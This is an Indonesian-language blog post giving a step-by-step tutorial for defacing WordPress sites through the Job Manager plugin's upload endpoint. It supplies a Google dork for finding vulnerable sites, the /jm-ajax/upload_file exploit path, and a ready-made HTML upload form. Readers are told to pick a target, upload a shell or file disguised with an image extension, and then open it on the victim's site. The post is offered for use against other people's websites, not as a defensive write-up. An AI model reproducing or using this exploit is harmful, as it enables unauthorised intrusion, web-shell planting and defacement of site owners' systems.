Selamat sore kawan, kali ini saya akan memberikan tutorial deface wordpress plugin job manager
oke langsung saja
bahan bahan yang di butuhkan
1. Dork
inurl:/wp-content/uploads/job-manager-uploads/2. Exploit
http://target.com /jm-ajax/upload_file
3. Csrf
<html>untuk csrf ini kalian copy dan pastekan lewat notepad,sublime,notepad ++ atau yang lain dan simpan dengan extensi .html contoh csrf.html
<form method="post" action="http://target.com/jm-ajax/upload_file/" enctype="multipart/form-data">
<input type="file" name="file"> <input type="submit" value="upload">
</form>
</html>
Langkah-langkah
- Pertama dorking dulu di google menggunakan dork di atas tadi
- silahkan pilih salah satu target kalian
- setelah itu masukan exploit nya di belakang url target contoh http://afikganteng.com/jm-ajax/upload_file
- Jika vuln tandanya seperti gambar di bawah ini
- selanjutnya masukkan target ke csrf, pada bagian <form method="post" action="http://target.com/jm-ajax/upload_file/" enctype="multipart/form-data"> target.com ganti dengan url target kalian misal http://afikganteng.com
- simpan lagi csrf nya dengan menekan tombol ctrl + s kemudian buka csrf nya menggunakan web browser
- selanjutnya pilih choose file, silahkan upload file atau shell kalian tapi ingat di sini extensi nya harus .jpg .gif atau .png, jika sudah klik upload
- jika berhasil muncul tampilan seperti di bawah ini
9. Oke kalo mau lihat file yang sudah kita upload tadi tinggal ketik di belakang url
/wp-content/uploads/job-manager-uploads/file/2018/01/uhu-1.jpgcontoh http://afikganteng /wp-content/uploads/job-manager-uploads/file/2018/01/uhu-1.jpg
oke itulah tutorial sederhana dari saya, itu untuk yang menggunakan csrf ya untuk yang menggunakan tool silahkan kalian mampir di www.indoxploit.or.id sekian see you next tutorial
thx indoXploit
kalo kalian bingung bisa lihat video di bawah ini
Tidak ada komentar:
Posting Komentar